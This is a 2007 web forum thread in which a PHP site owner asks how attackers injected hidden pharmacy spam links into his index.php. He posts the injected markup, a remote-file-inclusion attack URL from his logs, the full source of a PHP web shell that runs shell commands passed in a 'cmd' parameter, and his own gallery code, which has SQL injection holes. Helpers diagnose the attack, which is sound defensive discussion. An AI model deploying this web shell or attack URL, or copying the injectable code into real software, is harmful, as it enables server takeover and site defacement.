Page 1 of 2

PHP app hack attack

Posted: Mon May 21, 2007 10:21 am
by kendall
Ok...

I have built a PHP driven website and up to late yesterday i have been attacked...

I have downloaded my index.php file and i am seeing code being inserted into the file

Code: Select all

<!-- o4 -->                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                <LINK REL="StyleSheet" HREF="http://pipka.mcdir.ru/ghuma/ghstyle.css" TYPE="text/css"><!-- c4 --></head>
	
	<body><!-- o4 -->                                                                                                                                                                                                                                                                             <a class=prost href="http://xmlpdf.com/photos/search/search.php?q=Acyclovir">Acyclovir</font>, <br></a> <a class=prost href="http://xmlpdf.com/photos/search/search.php?q=Abilify">Abilify</font>, <br></a> <a class=prost href="http://xmlpdf.com/photos/search/search.php?q=Amitriptyline">Amitriptyline</font>, <br></a> <a class=prost href="http://xmlpdf.com/photos/search/search.php?q=Biaxin">Biaxin</font>, <br></a> <a class=prost href="http://xmlpdf.com/photos/search/search.php?q=<span style='color:red;text-decoration:blink' title='Alert a moderator!'>grilled spam</span>"><span style='color:red;text-decoration:blink' title='Alert a moderator!'>grilled spam</span></font>, <br></a> <a class=prost href="http://xmlpdf.com/photos/search/search.php?q=Diazepam">Diazepam</font>, <br></a> <a class=prost href="http://xmlpdf.com/photos/search/search.php?q=Femara">Femara</font>, <br></a> <a class=prost href="http://xmlpdf.com/photos/search/search.php?q=<span style='color:red;text-decoration:blink' title='Alert a moderator!'>grilled spam</span>"><span style='color:red;text-decoration:blink' title='Alert a moderator!'>grilled spam</span></font>, <br></a> <a class=prost href="http://xmlpdf.com/photos/search/search.php?q=Lodine">Lodine</font>, <br></a> <a class=prost href="http://xmlpdf.com/photos/search/search.php?q=Metformin">Metformin</font>, <br></a> <a class=prost href="http://xmlpdf.com/photos/search/search.php?q=Nexium">Nexium</font>, <br></a> <a class=prost href="http://xmlpdf.com/photos/search/search.php?q=Oxycontin">Oxycontin</font>, <br></a> <a class=prost href="http://xmlpdf.com/photos/search/search.php?q=Plavix">Plavix</font>, <br></a> <a class=prost href="http://xmlpdf.com/photos/search/search.php?q=<span style='color:red;text-decoration:blink' title='Alert a moderator!'>grilled spam</span>"><span style='color:red;text-decoration:blink' title='Alert a moderator!'>grilled spam</span></font>, <br></a> <a class=prost href="http://xmlpdf.com/photos/search/search.php?q=Seroquel">Seroquel</font>, <br></a> <a class=prost href="http://xmlpdf.com/photos/search/search.php?q=Tysabri">Tysabri</font>, <br></a> <a class=prost href="http://xmlpdf.com/photos/search/search.php?q=<span style='color:red;text-decoration:blink' title='Alert a moderator!'>grilled spam</span>"><span style='color:red;text-decoration:blink' title='Alert a moderator!'>grilled spam</span></font>, <br></a> <a class=prost href="http://xmlpdf.com/photos/search/search.php?q=Zocor">Zocor</font>.</a> <!-- c4 -->
so i have my original code in the file but somewhere along this above code is appearing...

What kind of attack is this?
what should i be looking for in my coding that is being used to carry out this attack?
what is recommended to stop it?

Hacker site

Posted: Mon May 21, 2007 11:14 am
by kendall
just to update you...

http://linuxcmd.netfast.org/test2.txt?&cmd=id

http://www.braskolmat.se/bilder/home.txt??

these were the 2 website that i had found in my web stats...

i dont understand though what the code suggests...

Posted: Mon May 21, 2007 11:35 am
by kendall
/photo_gallery/gallery.php?gid=http://linuxcmd.netfast.org/test2.txt?&cmd=id

was a link to a script that searched a database for a record....wear "gid" is the id of the gallery

im not sure how this ties in with him being able to consume my page and replace the code with something else... :?: :?: :? :? 8O

Posted: Mon May 21, 2007 11:51 am
by RobertGonzalez
Are you hosted with iPowerweb by any chance?

Posted: Mon May 21, 2007 12:00 pm
by kendall
no....what would that have to do with anything?


hahaha...sounds like youre scared dude! :P

Posted: Mon May 21, 2007 12:06 pm
by RobertGonzalez
Nope, I was hosted with them once, and I had several instances where there servers were compromised and hundreds of their clients sites got hacked similar to yours. They could not ever locate the cause of the breach and their only support assistance was restoring the site files to what they were two days ago.

I have switched to a dedicated server and have not had that problem any more. I asked the question just as a gauge as to whether they have finally figured out how to secure a server or not.

Posted: Mon May 21, 2007 12:54 pm
by kendall

Code: Select all

/*
 * *** By Andi_ ***
 * * smurnoffsrv (at) gmail dot com *
 * * replace dot with "." *
 * * replace (at) with "@" *
 *
*/
//INFO table (pro and normal)
/*if (@file_exists("/usr/X11R6/bin/xterm")) $pro1="<i>xterm</i> at /usr/X11R6/bin/xterm, ";
if (@file_exists("/usr/bin/nc")) $pro2="<i>nc</i> at /usr/bin/nc, ";
if (@file_exists("/usr/bin/wget")) $pro3="<i>wget</i> at /usr/bin/wget, ";
if (@file_exists("/usr/bin/lynx")) $pro4="<i>lynx</i> at /usr/bin/lynx, ";
if (@file_exists("/usr/bin/gcc")) $pro5="<i>gcc</i> at /usr/bin/gcc, ";
if (@file_exists("/usr/bin/cc")) $pro6="<i>cc</i> at /usr/bin/cc ";*/
$safe = @ini_get('safe_mode');
if ($safe) $pro.="<b><i>safe_mode</i>: $safe</b>, "; else $pro.="<b><i>safe_mode</i>: NO</b>, ";
$pro .= "<i>PHP </i>".phpversion();
$login=@posix_getuid(); $euid=@posix_geteuid(); $gid=@posix_getgid();
$ip=@gethostbyname($_SERVER['HTTP_HOST']);
$uname = @posix_uname();

 while (list($info, $value) = each ($uname)) { ?>
<tr><td><b><?=$info ?>:</b> <?=$value;?></td></tr><?php } ?>
<tr><td><b>pro info: ip </b><?="$ip, $pro";?></td></tr>
<?
$pego = $_GET['cmd'];
$out1 = shell_exec($pego);
$out2 = exec($pego);
$out3 = system($pego, $retval);
echo "<pre>$out1</pre>";
echo "<pre>$out2</pre>";
\
This was the code that i found at the sites that i had filtered through my access logs....im not sure what it does...as i am failing in trying to reproduce what it does

Posted: Mon May 21, 2007 1:25 pm
by timvw
It executes any shell command you pass via the cmd parameter in the URI...

Posted: Mon May 21, 2007 1:41 pm
by kendall
timvw wrote:It executes any shell command you pass via the cmd parameter in the URI...
if he's trying to do that...then how in the hell is he able to execute them from my site? on my server?

from what the access logs provided he is passing a url (this is the url for which i found that execute script) as a paramater to my app....But the thing is...i am not including the paramter....its actually going to a SQL statement...thus im not doing anything concerning server execute commands

i am however doing alot of include statements so im wondering if that could be the problem

Posted: Mon May 21, 2007 1:51 pm
by timvw
Exploiting remote include is a common flaw (that common that most hosts don't allow remote include anymore)...

My advice: make a backup of your existing site (in case you can't find a recent backup) and take it all offline... Make sure you change all your passwords (including database credentials since it's pretty sure these have been exposed to the attackers)...

Posted: Mon May 21, 2007 2:30 pm
by kendall
timvw wrote:Exploiting remote include is a common flaw (that common that most hosts don't allow remote include anymore)...

ok im in the process of doing that...

what about my code...i really dont see how he could have gotten into my system....atleast from the method he used...

Posted: Mon May 21, 2007 2:47 pm
by timvw
What's this forum for? Post some code so we can have a look at it ;)

My bets are on:
- regular expression matching and it has an 'e' modifier?
- including('...' . $_GET['evil'] . '.php');...

Posted: Mon May 21, 2007 2:52 pm
by kendall
well here is the meat of it really

Code: Select all

<?php
/*
This page will dynamically display the photo index for the gallery
and allow the user to page thru the the gallery one page at a time
*/
require($_SERVER['DOCUMENT_ROOT'].'/Connections/opmConn2.php');
define ("ALBUM_PATH", "http://www.".$_SERVER['HTTP_HOST']."/photo_gallery/"); // relative path to photos
function display_gallerySelect($conn){
	$galleryID = htmlentities($_GET['gid']);
	// Build the HTML for the option select to change the Gallery
	$query_galleryRS = "SELECT * FROM galleries WHERE `Status` = 1 ORDER BY DateID DESC";
	$galleryRS = mysql_query($query_galleryRS, $conn) or die(mysql_error());
	$row_galleryRS = mysql_fetch_assoc($galleryRS);
	
	$selectHTML = "<select name=\"gid\" id=\"gid\">";		//	Initiate the select variable to store the HTML
	
	do {						// Loop thru record set to populate options
		$selectText = "";		// Used to set whether option is selected or not
		$galleryID = $row_galleryRS['GalleryID'];
		$galleryTitle = $row_galleryRS['Title'];
		if ($row_galleryRS['GalleryID'] == $galleryID){		//	if the GalleryID column = the current gallery
			$currentGallery = $galleryTitle;						//	set current gallery
			$selectText = "selected";								//	Set selected text for this option
		}
		$selectHTML .= "<option value=\"".$row_galleryRS['GalleryID']."\" ".$selectText.">".$galleryTitle."</option>";
	} while ($row_galleryRS = mysql_fetch_assoc($galleryRS));
	
	$selectHTML .= "</select><input name=\"pid\" type=\"hidden\" value=\"gallery\"> <input type=\"submit\" name=\"submit\" value=\"Go\">";

	return $selectHTML;
} //end display_gallerySelect()

function get_currentGallery($conn){
	$galleryID = htmlentities($_GET['gid']);
	$query_galleryRS = "SELECT * FROM galleries WHERE GalleryID = '$galleryID)'";
	$galleryRS = mysql_query($query_galleryRS, $conn) or die(mysql_error());
	$row_galleryRS = mysql_fetch_assoc($galleryRS);
	
	$currentGallery = $row_galleryRS['Title'];
	
	return $currentGallery;
} //end get_currentGallery()

function display_galleryIndex($conn){
	$photosPerRow = 2;
	$colCount = 1;					//Initialize the column count of the row
	$galleryID = htmlentities($_GET['gid']);
	$currentPhoto = "";
	if (isset($_GET['id']))
		$currentPhoto = $_GET['id'];
	$galleryIndexHtml = "";			// Initialize variable to store the the gallery index HTML
	$photoNum=0;					// To match the current photo that in the index
	$imgFile = "";					// To store the path to the current image
	$imgSrcHTML = "";				// Initialize the variable to store the <img src> HTML
	
	$query_photosRS = "SELECT * FROM photos WHERE Gallery = '$galleryID' AND `Status` = 1 ORDER BY PhotoID";
	$photosRS = mysql_query($query_photosRS, $conn) or die(mysql_error());
	$row_photosRS = mysql_fetch_assoc($photosRS);
	$totalPhotos = mysql_num_rows($photosRS);
	$numRows = ceil($totalPhotos/$photosPerRow);
	
	// To highlight Current photo when Gallery first loads
	if ($currentPhoto == "")
		$currentPhoto = $row_photosRS['PhotoID'];

	do {
		$photoID = $row_photosRS['PhotoID'];
		$photoClass = "photoOff";					// Style for Photo Border
		$photoID = $row_photosRS['PhotoID'];
		if ($colCount > $photosPerRow){
			$galleryIndexHtml .= "</tr><tr>";		// Break to new row
			$colCount = 1;							// Reset Column Count
		}
		if ($photoID == $currentPhoto){
			$photoClass = "photoOn";
			// === Build HTML for Current Photo
			$imgCaption = $row_photosRS['Caption'];
			$imgFile = "/photo_gallery/".$row_photosRS['Gallery']."/".$photoID."_450.jpg";
			$imgSrcHTML = "<img src=\"".$imgFile."\" width=\"450\" alt=\"".$imgCaption."\" class=\"$photoClass\">";
		
			/* // Image Size
			$imageSize = GetImageSize ($_SERVER['DOCUMENT_ROOT'].$imgFile);
			$imageWidth = $imageSize[0];
			$imageHeight = $imageSize[1];
			$windowWidth = 70+$imageSize[0];
			$windowHeight = 340+$imageHeight; */

		
		}
		$galleryIndexHtml .= sprintf("<td><a href=\"/photo_gallery/gallery.php?gid=$galleryID&id=$photoID\"><img src=\"/photo_gallery/%s/".$photoID."_70.jpg\" width=\"70\" alt=\"".$row_photosRS['Caption']."\" class=\"".$photoClass."\"></a></td>",$galleryID);
		$colCount++;
		$photoNum++;
	
	} while ($row_photosRS = mysql_fetch_assoc($photosRS));
	
	return $galleryIndexHtml;
	
} // end display_galleryIndex() 

function get_imgSrcHTML($conn){
	$currentPhoto = "";
	$galleryID = htmlentities($_GET['gid']);
	$imgPath = "/photo_gallery/$galleryID/";
	
	if (isset($_GET['id']))
		$currentPhoto = $_GET['id'];
	
 	if($currentPhoto != ""){
		$query_currentPhotosRS = sprintf("SELECT * FROM photos WHERE Gallery = '%s' AND PhotoID = '%s' AND `Status` = 1 ORDER BY PhotoID", $galleryID, $currentPhoto);
 	} else {
		$query_currentPhotosRS = sprintf("SELECT * FROM photos WHERE Gallery = '%s' AND `Status` = 1 ORDER BY PhotoID", $galleryID);
	}
			
	$currentPhotosRS = mysql_query($query_currentPhotosRS, $conn) or die(mysql_error());
	$row_currentPhotosRS = mysql_fetch_assoc($currentPhotosRS);
	
	$photoID = $row_currentPhotosRS['PhotoID'];
	global $currentImgCaption;
	$currentImgCaption = $row_currentPhotosRS['Caption'];
	$imgFile = $photoID."_450.jpg";					// To store the path to the current image

	$imgSrcHTML = "<img src=\"".$imgPath.$imgFile."\" width=\"450\" alt=\"".$currentImgCaption."\" class=\"featuresImg\">";
	
	return $imgSrcHTML;
} //end get_imgSrcHTML()


?>
and here is a function to which does the file includes

Code: Select all

function get_content(){
	global $menuGroup, $sectionID, $pid, $pageID, $pageTitle, $currentFilePath;
	
	if (strlen($pageID) == 0){
		///echo $pageID = $pid;
		$pageID = $menuGroup."000";
	}
	//echo "mr=".$currentFilePath;
	
	/*//$uri = $_SERVER['REQUEST_URI'];
	$uriSplit = split("/", $uri);
	$filePath = "";
	for ($i=0; $i<count($uriSplit)-1; $i++){
		$filePath .= $uriSplit[$i]."/";
	}*/
	//echo "page id = ".$pageID;
	//$fileExists = False;
	$filePath = get_pagePath();
	$filePath = $currentFilePath;
	//$extension = "html";
	$contentFileHtml = $_SERVER['DOCUMENT_ROOT']."/".$sectionID."/".$pageID.".html";
	$contentFilePhp = $_SERVER['DOCUMENT_ROOT']."/".$sectionID."/".$pageID.".php";
	$contentFile = $contentFileHtml;				// Default assignment for the content file
	if (!file_exists($contentFile))
		$contentFile = $contentFilePhp;				// Set as file with PHP extension
	$defaultPageID = $menuGroup."000";
	$defaultContentFile = $_SERVER['DOCUMENT_ROOT']."/".$sectionID."/".$defaultPageID.".html";
	$pageHead = "<div><img src=\"/images/heading1_".$sectionID.".gif\" ></div>";
	if (isset($_GET['print']) && $_GET['print'] == "1")	{			// Print just the Content
		$pfSectionID = str_replace ("_", " ", $sectionID);
		$pageHead = "<br /><img src=\"/images/heading1_".$sectionID.".gif\" >";
	}
/* 	if (file_exists($contentFile)){
		echo $pageHead;
		include ($contentFile);
	} elseif ((strlen($_SERVER['QUERY_STRING']) == 0 || isset($_GET['print'])) && file_exists($defaultContentFile)){
		echo $pageHead;
		include ($defaultContentFile);
	} else {
		echo $pageHead;
		include ($_SERVER['DOCUMENT_ROOT'].'/includes/404.html');
	}

 */	
 	if (file_exists($contentFileHtml)){
		echo $pageHead;
		include ($contentFileHtml);
	} elseif (file_exists($contentFilePhp)){
		echo $pageHead;
		include ($contentFilePhp);
	} elseif ((strlen($_SERVER['QUERY_STRING']) == 0 || isset($_GET['print'])) && file_exists($defaultContentFile)){
		echo $pageHead;
		include ($defaultContentFile);
	} else {
		echo $pageHead;
		include ($_SERVER['DOCUMENT_ROOT'].'/includes/404.html');
	}

 
 
 	//$fileExists = True;

	//$fileExists = fileExists($pageID, "html");
	//$content = $fileExists;
	
	//return $content;
}
the $pid and the $galleryID are the only variables being sent via $_GET...

i had just put in the htmlentities() function as a temporary thing till i figure out what really is causing the break

Posted: Tue May 22, 2007 11:42 am
by pagedown
Apologies if this is rubbish but...

There is a line

Code: Select all

$currentPhoto = $_GET['id'];
and then $currentPhoto is used here

Code: Select all

$query_currentPhotosRS = sprintf("SELECT * FROM photos WHERE Gallery = '%s' AND PhotoID = '%s' AND `Status` = 1 ORDER BY PhotoID", $galleryID, $currentPhoto);
so part of this line becomes ...

Code: Select all

AND PhotoID = $currentPhoto
but $currentPhoto can be anything the hacker wants can't it? for example "zzz AND <evil code>"

Don't know how that could lead on to what happened to you but it looks like a vulnerability?

Mike

Posted: Tue May 22, 2007 11:48 am
by kendall
coool MIKE...thanks :)

im looking at doing some OBfuscation

jeez it looks complicated